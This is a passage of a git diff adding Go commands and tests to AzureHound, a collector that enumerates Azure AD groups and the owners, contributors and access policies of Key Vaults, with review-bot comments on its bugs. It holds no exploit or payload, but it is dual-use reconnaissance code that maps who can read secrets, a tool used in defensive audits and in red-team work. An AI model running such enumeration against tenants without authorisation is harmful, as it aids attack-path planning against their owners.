+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if data, ok := wrapper.Data.(models.GroupOwners); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupOwners{})
+ } else if len(data.Owners) != 2 {
+ t.Errorf("got %v, want %v", len(data.Owners), 2)
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if data, ok := wrapper.Data.(models.GroupOwners); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupOwners{})
+ } else if len(data.Owners) != 1 {
+ t.Errorf("got %v, want %v", len(data.Owners), 2)
+ }
+}
diff --git a/cmd/list-groups.go b/cmd/list-groups.go
new file mode 100644
index 0000000..0031d39
--- /dev/null
+++ b/cmd/list-groups.go
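Review bot: The last failure message in `TestListGroupOwners` reports the wrong expectation: the condition is `len(data.Owners) != 1` but the message prints `want 2`. It should read `t.Errorf("got %v, want %v", len(data.Owners), 1)`, as the matching branch in `TestListGroupMembers` does, otherwise a failure here points the reader at the wrong count.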
@@ -0,0 +1,92 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listGroupsCmd)
+}
+
+var listGroupsCmd = &cobra.Command{
+ Use: "groups",
+ Long: "Lists Azure Active Directory Groups",
+ Run: listGroupsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listGroupsCmdImpl(cmd *cobra.Command, _ []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure active directory groups...")
+ start := time.Now()
+ stream := listGroups(ctx, azClient)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listGroups(ctx context.Context, client client.AzureClient) <-chan interface{} {
+ out := make(chan interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+ count := 0
+ for item := range client.ListAzureADGroups(ctx, query.GraphParams{Filter: "securityEnabled eq true"}) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing groups")
+ return
+ } else {
+ log.V(2).Info("found group", "group", item)
+ count++
+ group := models.Group{
+ Group: item.Ok,
+ TenantId: client.TenantInfo().TenantId,
+ TenantName: client.TenantInfo().DisplayName,
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZGroup,
+ Data: group,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.Info("finished listing all groups", "count", count)
+ }()
+
+ return out
+}
diff --git a/cmd/list-groups_test.go b/cmd/list-groups_test.go
new file mode 100644
index 0000000..175a74e
--- /dev/null
+++ b/cmd/list-groups_test.go
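Review bot: The hard-coded `query.GraphParams{Filter: "securityEnabled eq true"}` in `listGroups` limits collection to security-enabled groups, and neither the command's `Long` text nor a comment says so. Because listGroupMembers and listGroupOwners are fed from this stream, groups with `securityEnabled` false are absent from every group-related output, which a reader of the results needs to know. If the restriction is deliberate, a comment above the loop such as `// Only security-enabled groups are collected; all other groups are skipped.` and a mention in `Long` would document the scope. `client.TenantInfo()` is also called twice per item and could be read once before the loop.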
@@ -0,0 +1,70 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListGroups(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+ mockChannel := make(chan client.AzureResult[azure.Group])
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureADGroups(gomock.Any(), gomock.Any()).Return(mockChannel)
+
+ go func() {
+ defer close(mockChannel)
+ mockChannel <- client.AzureResult[azure.Group]{
+ Ok: azure.Group{},
+ }
+ mockChannel <- client.AzureResult[azure.Group]{
+ Error: mockError,
+ }
+ mockChannel <- client.AzureResult[azure.Group]{
+ Ok: azure.Group{},
+ }
+ }()
+
+ channel := listGroups(ctx, mockClient)
+ result := <-channel
+ if _, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("expected channel to close from an error result but it did not")
+ }
+}
diff --git a/cmd/list-key-vault-access-policies.go b/cmd/list-key-vault-access-policies.go
new file mode 100644
index 0000000..31c8d79
--- /dev/null
+++ b/cmd/list-key-vault-access-policies.go
@@ -0,0 +1,130 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ kinds "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+var listKeyVaultAccessPoliciesCmd = &cobra.Command{
+ Use: "key-vault-access-policies",
+ Long: "Lists Azure Key Vault Access Policies",
+ Run: listKeyVaultAccessPoliciesCmdImpl,
+ SilenceUsage: true,
+}
+
+func init() {
+ config.Init(listKeyVaultAccessPoliciesCmd, []config.Config{config.KeyVaultAccessTypes})
+ listRootCmd.AddCommand(listKeyVaultAccessPoliciesCmd)
+}
+
+func listKeyVaultAccessPoliciesCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vault access policies...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ if filters, ok := config.KeyVaultAccessTypes.Value().([]enums.KeyVaultAccessType); !ok {
+ exit(fmt.Errorf("filter failed type assertion"))
+ } else {
+ if len(filters) > 0 {
+ log.Info("applying access type filters", "filters", filters)
+ }
+ stream := listKeyVaultAccessPolicies(ctx, azClient, listKeyVaults(ctx, azClient, subscriptions), filters)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+}
+
+func listKeyVaultAccessPolicies(ctx context.Context, client client.AzureClient, keyVaults <-chan interface{}, filters []enums.KeyVaultAccessType) <-chan interface{} {
+ out := make(chan interface{})
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(out)
+
+ for result := range pipeline.OrDone(ctx.Done(), keyVaults) {
+ if keyVault, ok := result.(AzureWrapper).Data.(models.KeyVault); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating key vault access policies", "result", result)
+ return
+ } else {
+ for _, policy := range keyVault.Properties.AccessPolicies {
+ if len(filters) == 0 {
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: kinds.KindAZKeyVaultAccessPolicy,
+ Data: models.KeyVaultAccessPolicy{
+ KeyVaultId: keyVault.Id,
+ AccessPolicyEntry: policy,
+ },
+ }); !ok {
+ return
+ }
+ } else {
+ for _, filter := range filters {
+ permissions := func() []string {
+ switch filter {
+ case enums.GetCerts:
+ return policy.Permissions.Certificates
+ case enums.GetKeys:
+ return policy.Permissions.Keys
+ case enums.GetSecrets:
+ return policy.Permissions.Secrets
+ default:
+ log.Error(fmt.Errorf("unsupported key vault access type: %s", filter), "unable to apply key vault access policy filter")
+ return []string{}
+ }
+ }()
+ if contains(permissions, "Get") {
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: kinds.KindAZKeyVaultAccessPolicy,
+ Data: models.KeyVaultAccessPolicy{
+ KeyVaultId: keyVault.Id,
+ AccessPolicyEntry: policy,
+ },
+ }); !ok {
+ return
+ }
+ break
+ }
+ }
+ }
+ }
+ }
+ }
+ }()
+
+ return out
+}
diff --git a/cmd/list-key-vault-access-policies_test.go b/cmd/list-key-vault-access-policies_test.go
new file mode 100644
index 0000000..877fe1f
--- /dev/null
+++ b/cmd/list-key-vault-access-policies_test.go
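Review bot: The filter branch of `listKeyVaultAccessPolicies` keeps a policy only when `contains(permissions, "Get")` is true, so a policy whose list spells the permission `get`, or grants it through `all`, would be dropped from the filtered output if `contains` (defined outside this hunk) is an exact, case-sensitive match. For a collector whose output is used to judge which principals can read keys, secrets or certificates, that is silent under-reporting. A case-insensitive check that also accepts `all` would close the gap, for example `slices.ContainsFunc(permissions, func(p string) bool { return strings.EqualFold(p, "get") || strings.EqualFold(p, "all") })`, which needs the `slices` and `strings` imports. A short comment on the `break` saying that one matching filter is enough to emit the policy once would also help the next reader.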
@@ -0,0 +1,79 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaultAccessPolicies(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockKeyVaultsChannel := make(chan interface{})
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listKeyVaultAccessPolicies(ctx, mockClient, mockKeyVaultsChannel, nil)
+
+ go func() {
+ defer close(mockKeyVaultsChannel)
+ mockKeyVaultsChannel <- AzureWrapper{
+ Data: models.KeyVault{
+ KeyVault: azure.KeyVault{
+ Properties: azure.VaultProperties{
+ AccessPolicies: []azure.AccessPolicyEntry{
+ {
+ Permissions: azure.KeyVaultPermissions{
+ Certificates: []string{"Get"},
+ },
+ },
+ },
+ },
+ },
+ },
+ }
+ mockKeyVaultsChannel <- AzureWrapper{
+ Data: models.KeyVault{},
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.KeyVaultAccessPolicy); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVaultAccessPolicy{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-key-vault-contributors.go b/cmd/list-key-vault-contributors.go
new file mode 100644
index 0000000..8bea518
--- /dev/null
+++ b/cmd/list-key-vault-contributors.go
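Review bot: `TestListKeyVaultAccessPolicies` passes `nil` for `filters`, so the `enums.GetCerts` / `enums.GetKeys` / `enums.GetSecrets` branch of `listKeyVaultAccessPolicies` is never executed by this test. A second case that calls it with `[]enums.KeyVaultAccessType{enums.GetCerts}` and feeds one policy that matches and one that does not would pin the filtering behaviour, which is the part of the function that decides what gets reported. The failure message `"should not have recieved from channel"` also misspells "received".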
@@ -0,0 +1,83 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listKeyVaultContributorsCmd)
+}
+
+var listKeyVaultContributorsCmd = &cobra.Command{
+ Use: "key-vault-contributors",
+ Long: "Lists Azure Key Vault Contributors",
+ Run: listKeyVaultContributorsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listKeyVaultContributorsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vault contributors...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ keyVaults := listKeyVaults(ctx, azClient, subscriptions)
+ kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listKeyVaultContributors(ctx, kvRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listKeyVaultContributors(
+ ctx context.Context,
+ kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.ContributorRoleID))
+
+ contributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultContributor {
+ return models.KeyVaultContributor{
+ Contributor: ra.RoleAssignment,
+ KeyVaultId: ra.KeyVaultId,
+ }
+ })
+
+ return NewAzureWrapper(enums.KindAZKeyVaultContributor, models.KeyVaultContributors{
+ KeyVaultId: ra.Data.KeyVaultId,
+ Contributors: contributors,
+ })
+ })
+}
diff --git a/cmd/list-key-vault-contributors_test.go b/cmd/list-key-vault-contributors_test.go
new file mode 100644
index 0000000..d02586b
--- /dev/null
+++ b/cmd/list-key-vault-contributors_test.go
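Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in `listKeyVaultContributorsCmdImpl` registers for `os.Kill`, but SIGKILL cannot be caught by a process, so that argument never fires and static checkers flag it. If the intent is a clean shutdown on a termination request, `signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)` expresses that and needs only a `syscall` import. The same call appears in the `*CmdImpl` functions of the other key-vault command files in this patch, including list-key-vault-access-policies.go before this one.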
@@ -0,0 +1,73 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaultContributors(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listKeyVaultContributors(ctx, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- NewAzureWrapper(enums.KindAZKeyVaultRoleAssignment, models.KeyVaultRoleAssignments{
+ KeyVaultId: "foo",
+ RoleAssignments: []models.KeyVaultRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.ContributorRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.ContributorRoleID,
+ },
+ },
+ },
+ },
+ })
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-key-vault-kvcontributors.go b/cmd/list-key-vault-kvcontributors.go
new file mode 100644
index 0000000..1e8a864
--- /dev/null
+++ b/cmd/list-key-vault-kvcontributors.go
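Review bot: `TestListKeyVaultContributors` feeds only an assignment whose `RoleDefinitionId` is `constants.ContributorRoleID` and then discards the received value (`if _, ok := <-channel; !ok`), so it would still pass if the role filter in `listKeyVaultContributors` let every assignment through. Adding a second assignment with a different role ID and asserting on the length of the returned `Contributors` slice would cover the filter. The kvcontributors and owners tests later in this patch have the same shape. `mockClient` is also created here but never passed to the function under test.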
@@ -0,0 +1,83 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listKeyVaultKVContributorsCmd)
+}
+
+var listKeyVaultKVContributorsCmd = &cobra.Command{
+ Use: "key-vault-kvcontributors",
+ Long: "Lists Azure Key Vault KVContributors",
+ Run: listKeyVaultKVContributorsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listKeyVaultKVContributorsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vault kvcontributors...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ keyVaults := listKeyVaults(ctx, azClient, subscriptions)
+ kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listKeyVaultKVContributors(ctx, kvRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listKeyVaultKVContributors(
+ ctx context.Context,
+ kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.KeyVaultContributorRoleID))
+
+ kvContributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultKVContributor {
+ return models.KeyVaultKVContributor{
+ KVContributor: ra.RoleAssignment,
+ KeyVaultId: ra.KeyVaultId,
+ }
+ })
+
+ return NewAzureWrapper(enums.KindAZKeyVaultKVContributor, models.KeyVaultKVContributors{
+ KeyVaultId: ra.Data.KeyVaultId,
+ KVContributors: kvContributors,
+ })
+ })
+}
diff --git a/cmd/list-key-vault-kvcontributors_test.go b/cmd/list-key-vault-kvcontributors_test.go
new file mode 100644
index 0000000..cd345d9
--- /dev/null
+++ b/cmd/list-key-vault-kvcontributors_test.go
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaultKVContributors(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listKeyVaultKVContributors(ctx, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZKeyVaultRoleAssignment,
+ models.KeyVaultRoleAssignments{
+ KeyVaultId: "foo",
+ RoleAssignments: []models.KeyVaultRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.KeyVaultContributorRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.KeyVaultContributorRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-key-vault-owners.go b/cmd/list-key-vault-owners.go
new file mode 100644
index 0000000..3adb5d5
--- /dev/null
+++ b/cmd/list-key-vault-owners.go
@@ -0,0 +1,83 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listKeyVaultOwnersCmd)
+}
+
+var listKeyVaultOwnersCmd = &cobra.Command{
+ Use: "key-vault-owners",
+ Long: "Lists Azure Key Vault Owners",
+ Run: listKeyVaultOwnersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listKeyVaultOwnersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vault owners...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ keyVaults := listKeyVaults(ctx, azClient, subscriptions)
+ kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listKeyVaultOwners(ctx, kvRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listKeyVaultOwners(
+ ctx context.Context,
+ kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.OwnerRoleID))
+
+ kvContributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultOwner {
+ return models.KeyVaultOwner{
+ Owner: ra.RoleAssignment,
+ KeyVaultId: ra.KeyVaultId,
+ }
+ })
+
+ return NewAzureWrapper(enums.KindAZKeyVaultOwner, models.KeyVaultOwners{
+ KeyVaultId: ra.Data.KeyVaultId,
+ Owners: kvContributors,
+ })
+ })
+}
diff --git a/cmd/list-key-vault-owners_test.go b/cmd/list-key-vault-owners_test.go
new file mode 100644
index 0000000..c529689
--- /dev/null
+++ b/cmd/list-key-vault-owners_test.go
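Review bot: In `listKeyVaultOwners` the mapped slice is named `kvContributors` although it holds `models.KeyVaultOwner` values, which reads like a leftover from the kvcontributors file; `owners := internal.Map(...)` with `Owners: owners,` would match the data. list-key-vault-user-access-admins.go later in this patch carries the same leftover name for its `models.KeyVaultUserAccessAdmin` slice. The inner closure parameter `ra` also shadows the outer `ra`, so a distinct name such as `assignment` would make `ra.Data.KeyVaultId` in the final return easier to follow.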
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
